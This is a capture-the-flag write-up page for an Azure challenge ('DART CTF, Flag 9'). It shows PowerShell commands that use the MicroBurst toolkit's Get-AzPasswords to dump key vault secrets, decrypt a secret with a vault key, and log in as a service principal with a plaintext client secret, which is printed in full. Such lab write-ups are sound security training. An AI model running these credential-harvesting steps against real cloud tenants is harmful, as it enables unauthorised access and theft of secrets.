Kabinet's GitBook
  • 🚩Kabinet CTF's Writeups
  • Page
  • 2025
    • Thuderdome
      • Emerge through the breach
      • Pulled from the sky
      • An absent defense
      • A new wave (web of deceit)
      • Crossing the great divide
      • Joining forces as one
      • Infiltrate (open the gate)
      • Jaeger
      • Victory
  • 2024
    • GreyCTF 2024
      • Markdown Parser
      • Fearless Concurrency
      • GreyCTF Survey
      • Baby Web
      • Beautiful Styles
      • All About Timing
      • Poly Playground
    • TetCTF 2024
      • Hello from API GW
      • Microservices
  • 2023
    • BSidesSF Cloud Village CTF
      • Tony Tony Tony
      • Plain Sight
      • A Suit of Armor Around The World
      • Sharing is Caring + Sequel
      • Photo Drive
    • DART CTF
      • Flag 1
      • Flag 2
      • Flag 3
      • Flag 4
      • Flag 5
      • Flag 6
      • Flag 7
      • Flag 8
      • Flag 9
      • Flag 10
    • EKS Cluster Games
    • Big IAM Challenge
  • 2022
    • Stack The Flag
      • Secret of Meow Olympurr
  • Authored
    • Cyber League 2025 Major 1
      • Perfect Storage
      • catalog commits
      • pawtainer hub
    • Lag and Crash 2023
      • Managed Secrets
      • Pickle Rick
      • Cloudy with a chance of meatball
    • NYP InfoSec December CTF 2022
      • Super Secure Technology Infrastructure
      • Self Introduction
      • Aww Cuter Cat
      • Obligatory Calc
      • BreadSecurity
  • NYP InfoSec Introduction to Pentesting Workshop
Powered by GitBook
On this page

Was this helpful?

  1. 2023
  2. DART CTF

Flag 9

PreviousFlag 8NextFlag 10

Last updated 2 years ago

Was this helpful?

Continuing on with the enumeration of the key vault, there are few other secrets within it.

  • 0704d1bc-950f-42c8-b0cd-c0569d111da1

  • Ascension

  • Flag8

  • Flag9

Attempting to list Flag9 will show a forbidden error.

git clone https://github.com/NetSPI/MicroBurst
ipmo .\MicroBurst.psm1

Get-AzPasswords -Keys Y

Luckily I used the Get-AzPasswords as I wasn’t aware that the user has the ability to retrieve the key vault keys LICIACube.

$value = ConvertTo-SecureString -String "HcnxYfKieTn2XIJ54MCcSINWdSzWbWML06lbdkGei5PaTKrcJeru2fopglY3AM6x1W+rnx/xT7P9TfuUpaTV1MGqeC+NuW/Lh45ftdBUUZA+68Dv3AJQ909UR24eLBRC8r5y9/BGqbLZnQZCq8GGT5S78SQaS+QU1oOz5vMvijLE9j/CbHHSPKk2/Nof+xXOznwIsjwyaihjdXlDDDEE26OB7awkn5wGHJX7/bgCJw9HaqpJC5BDa+kD3gsZGg3Y8+7dKeow+D0tZHpk4IFBEsPg68BgYgugn/LDgZr8fifugjw+rpErqm4mDjQikYO1qwFowj0uUH4KSqYqZ+4+DQ==" -AsPlainText -Force

Invoke-AzKeyVaultKeyOperation -Operation "Decrypt" -Algorithm "RSA1_5" -Name "LICIACube" -VaultName "cubesat" -Value $value

With the new set of credentials, I attempt to login using the Connect-AzAccount cmdlets.

$appid="0704d1bc-950f-42c8-b0cd-c0569d111da1"
$secret="qj08Q~IeXpoPFNPLZiCK5pspf5fcBMqbqXy0Dbn9"

$tid= '5f487283-b88e-4ade-8035-7bcaac4156b3'

$creds = (ConvertTo-SecureString $secret -AsPlainText -Force)
$creds = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $appid,$creds

Connect-AzAccount -ServicePrincipal -TenantId $tid -Credential $creds

Running Get-AzResource shows the service principal having access to a cosmosdb and key vault.

I am then able to retrieve the Flag9 from the keyvault now.

Get-AzKeyVaultSecret -VaultName cubesat -Name Flag9 -AsPlainText

Flag 9 : Prepare for impact!

I decided to use MicroBurst Get-AzPasswords as I didnt want to manually list the remaining secrets. I refer to this on how to utilize the Get-AzPasswords

In the 0704d1bc-950f-42c8-b0cd-c0569d111da1 secret, it shows an encrypted text. After some googling, I found this that shows how to decrypt using the key vault key.

NETSPI blog
article
Invoke-AzKeyVaultKeyOperation (Az.KeyVault)MicrosoftLearn
Logo
A Guide to Gathering Azure Passwords - Azure Pentesting | NetSPI BlogNetSPI
Logo